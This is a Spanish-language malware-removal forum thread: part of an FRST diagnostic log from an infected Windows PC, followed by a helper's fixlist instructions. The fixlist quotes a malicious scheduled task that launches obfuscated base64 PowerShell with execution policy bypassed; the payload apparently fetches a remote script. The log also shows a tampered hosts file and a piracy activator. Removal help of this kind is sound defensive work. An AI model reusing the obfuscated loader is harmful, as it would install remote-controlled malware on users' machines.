HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\77576241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"

==================== Association (Whitelisted) =================

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 04:30 - 2019-11-23 14:18 - 000001012 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1                   license.avira.com
127.0.0.1                   62.146.210.6
127.0.0.1                   62.146.210.10
0.0.0.0                   telemetry.malwarebytes.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072623682\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072624070\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Alfredo y Diego\Pictures\japan.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\StartupFolder: => "Welcome.lnk"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\StartupApproved\Run: => "NetBalancer"
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\StartupApproved\Run: => "NetBalancer"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{C10AE170-F82A-4B4E-9A1B-0FD58F380673}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{2BF8D208-B1A9-49CA-94B8-C76C91D6DC27}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{409C381F-6252-4189-A0D6-1D853AECA432}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{44FF4D34-B7E4-4374-8312-8F6034AE79FF}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{7E9FD9B8-6893-45D6-85A7-823768AB61B2}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{F47A6534-32F0-4809-81EB-11D1999B0341}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{BA6A314B-F612-4F67-B4FA-82AC37CDB225}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{0F27CFC4-5D88-4FBE-B29C-3E7E04787082}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{034EBB93-05BC-4DCA-B601-532892C005E7}] => (Allow) C:\Program Files\WOMic\womicclient.exe () [File not signed]
FirewallRules: [TCP Query User{2D7A0D93-490E-4783-BA7A-7BCE836A271F}C:\program files\soulseekqt\soulseekqt.exe] => (Allow) C:\program files\soulseekqt\soulseekqt.exe () [File not signed]
FirewallRules: [UDP Query User{83C0F883-FF24-42B7-BCBE-AD199A908B7F}C:\program files\soulseekqt\soulseekqt.exe] => (Allow) C:\program files\soulseekqt\soulseekqt.exe () [File not signed]
FirewallRules: [{516EB9A4-E9E7-4111-AE83-004A90AC041A}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{7EE08CA1-6420-4E11-BFD5-D08A9A6F1C6D}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [TCP Query User{83827D30-5867-4418-9BC0-7EC57F94959F}C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe] => (Allow) C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe (Telegram FZ-LLC -> Telegram FZ-LLC)
FirewallRules: [UDP Query User{9829ACBF-2A09-467D-B4F5-C796784D0A6E}C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe] => (Allow) C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe (Telegram FZ-LLC -> Telegram FZ-LLC)
FirewallRules: [{BF42FCFB-2966-43C0-B98D-9CDE94AB2D27}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{DB2F6D70-FE0F-451E-99D6-2AB8DF99C811}] => (Block) LPort=445
FirewallRules: [{22929FC6-337C-4B8A-B235-5524BCADB8CD}] => (Allow) LPort=65532
FirewallRules: [{AEF94FB4-418F-4A60-AF02-64984FFCF2E2}] => (Block) LPort=445
FirewallRules: [{A0A1E9C9-5C9A-471C-9F6C-4B1C23976173}] => (Allow) LPort=65531
FirewallRules: [{07973D50-A474-4621-898F-4C73EC0DB89E}] => (Allow) LPort=65533
FirewallRules: [{AB9130B0-864B-49D2-9558-C21383817A64}] => (Block) LPort=445
FirewallRules: [{923EC434-EB71-46C6-914A-884E48B36D7F}] => (Block) LPort=445
FirewallRules: [{30B998DC-75D6-4156-95EB-265FD24D628D}] => (Block) LPort=445
FirewallRules: [{B1391700-10E2-43FC-A5EF-1EFB3D3B9A13}] => (Block) LPort=445
FirewallRules: [{2079D785-460B-4A5A-9CC3-71DCE55D19F8}] => (Allow) LPort=65529
FirewallRules: [{13E5D93B-5566-4BFF-9E69-881E58CA43B0}] => (Block) LPort=445
FirewallRules: [{076D4D22-0F61-402C-A92D-01DE3C0A37F1}] => (Block) LPort=445
FirewallRules: [{84770D54-494B-4AC4-828B-424081CEB1C9}] => (Block) LPort=445
FirewallRules: [{14131298-A239-4D8E-9944-3D77581E67E1}] => (Block) LPort=445

==================== Restore Points =========================

16-11-2019 01:48:32 Instalado Realtek High Definition Audio Driver

==================== Faulty Device Manager Devices ============

Name: Dispositivo USB desconocido (Error de solicitud de descriptor de dispositivo)
Description: Dispositivo USB desconocido (Error de solicitud de descriptor de dispositivo)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Controladora de host USB estándar)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Event log errors: ========================

Application errors:
==================
Error: (11/23/2019 10:07:51 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Error del procedimiento de apertura para el servicio "BITS" en el archivo DLL "C:\Windows\System32\bitsperf.dll". Los datos de rendimiento para este servicio no estarán disponibles. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de error.

Error: (11/23/2019 09:50:53 AM) (Source: MBAMIService) (EventID: 0) (User: )
Description: Event-ID 0

Error: (11/22/2019 10:24:16 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina QueryFullProcessImageNameW. HR = 0x80070006, Controlador no válido.
.


Operación:
   Ejecutando operación asincrónica

Contexto:
   Estado actual: DoSnapshotSet

Error: (11/22/2019 10:21:58 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Error en Servicios de cifrado mientras se procesaba el objeto "System Writer" de la llamada OnIdentity().

Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo de detección de nivel de vínculo de Microsoft.

System Error:
Acceso denegado.
.

Error: (11/22/2019 10:21:39 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado.
.
A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud.


Operación:
   Recopilando datos del escritor

Contexto:
   Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220}
   Nombre del escritor: System Writer
   Id. de instancia del escritor: {a9bf6df7-ee3e-4c3c-bddc-813803a0f303}

Error: (11/22/2019 07:34:39 PM) (Source: COM) (EventID: 18221) (User: NT AUTHORITY)
Description: Se denegó el acceso al intento de conexión con el servicio RPCSS para la aplicación de servidor COM C:\Windows\System32\Wbem\WMIC.exe al usuario No disponible\No disponible con SID (S-1-5-18) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). La causa más probable es que los límites de acceso a nivel de equipo no conceden permisos de acceso local al usuario o a la aplicación. Los límites de acceso se pueden modificar con la herramienta administrativa Servicios de componentes.

Error: (11/22/2019 04:21:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\Alfredo y Diego\Downloads\KMSAuto Lite\KMSAuto Lite 1.4.5 b1 Multilingual by Ratiborus\KMSAuto x64.exe".
No se encontró el ensamblado dependiente Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (11/22/2019 06:48:28 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Error del procedimiento de apertura para el servicio "BITS" en el archivo DLL "C:\Windows\System32\bitsperf.dll". Los datos de rendimiento para este servicio no estarán disponibles. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de error.


System errors:
=============
Error: (11/24/2019 07:23:56 AM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 10:37:15 PM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 10:35:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Adaptador de rendimiento de WMI terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (11/23/2019 08:26:59 PM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 12:21:36 PM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 12:21:45 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 10:30:42 a.m. del ‎23/‎11/‎2019 resultó inesperado.

Error: (11/23/2019 09:50:34 AM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 09:33:57 AM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.


CodeIntegrity:
===================================

Date: 2019-11-23 21:52:02.107
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae.dll that did not meet the Microsoft signing level requirements.

Date: 2019-11-23 12:29:46.793
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae.dll that did not meet the Microsoft signing level requirements.

==================== Memory info =========================== 

BIOS: American Megatrends Inc. P1.30 02/27/2008
Motherboard:                        Wolfdale1333-D667  
Processor: Intel(R) Pentium(R) Dual CPU E2180 @ 2.00GHz
Percentage of memory in use: 85%
Total physical RAM: 1015.3 MB
Available physical RAM: 149.15 MB
Total Virtual: 2743.3 MB
Available Virtual: 1352.92 MB

==================== Drives ================================

Drive c: (SYSTEM) (Fixed) (Total:148.71 GB) (Free:25.92 GB) NTFS

\\?\Volume{40834082-0000-0000-0000-100000000000}\ (Reservado para el sistema) (Fixed) (Total:0.34 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: 40834082)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=148.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Daniela · 26 Noviembre, 2019 11:53

Hola

No has descargado y ejecutado FRST desde el escritorio, muevelo allí si no fallará el paso del Fixlist.

MUY Importante Realiza una copia de seguridad del registro :

Para hacerlo descarga DelFix.exe( en tu escritorio).
Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona -Ejecutar como Administrador-).
Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO.
Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

A continuación con los demás programas cerrados ve a Inicio Ejecutar y escribe Notepad.exe.

Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.

START
CREATERESTOREPOINT:
CLOSEPROCESSES:
HKLM\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [NetLimiter] => "C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe" /minimized
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [] => [X]
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Winlogon: [Shell] C:\Windows\explorer.exe [4312248 2016-07-16] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {87402BF2-539F-45AA-B6A8-686921A45CD0} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1542536 2019-11-05] (AVAST Software s.r.o. -> AVAST Software)
Task: {D637D5F4-3706-45D2-9DED-A40EB449CDE9} - System32\Tasks\MicroSoft\Windows\owBmpfYO\JpNYrnb => cmd /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBNAGkAYwByAG8AUwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABvAHcAQgBtAHAAZgBZAE8AXABKAHAATgBZAHIAbgBiACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAbQB4AG4AeQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBpAGcAXwAyADA (the data entry has 586 more characters).
Task: {FEE784E9-0FE0-4E99-9F72-131A85CDE224} - \VQMUsn\GXQxU -> No File <==== ATTENTION
CHR Extension: (Asora) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfomjghdcjmkkmjpmdiimfllafbmpack [2018-08-12]
CHR Extension: (Chrome Media Router) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-11-06]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ijahobfejgeblmkpcmgpelfibgnnjpil]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
U4 dcpsvc; no ImagePath
U4 DiagTrack; no ImagePath
2019-11-16 01:54 - 2019-11-23 14:52 - 000002472 _____ C:\Windows\system32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B}
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-sys.job
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\IObit
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\ProgramData\IObit
2019-11-23 02:50 - 2018-11-10 22:07 - 000000000 ____D C:\ProgramData\{2F4FEA2C-A50D-60EA-23CB-FEA8B9897566}
ShellServiceObjects: No Name -> {872f8dc8-dde4-43bd-ac7a-e3d9fe86ceac} => 
ShellServiceObjects: No Name -> {900c0763-5cad-4a34-bc1f-40cd513679d5} => 
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION

HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio Esto es muy importante.

Nota Es importante que la herramienta FRST.exe (Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.

Y ahora usa el 2º MÉTODO: de esta Faq de Windows 8(aplicable a Windows 10) ¿Cómo iniciar Windows 8/8.1 en Modo Seguro?, para trabajar desde ese modo de windows.

Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas -Ejecutar como Administrador-).
Presionar el botón FIX y aguardar a que termine.
La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).

Pega el contenido de este fichero en tu próxima respuesta.

Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

Un saludo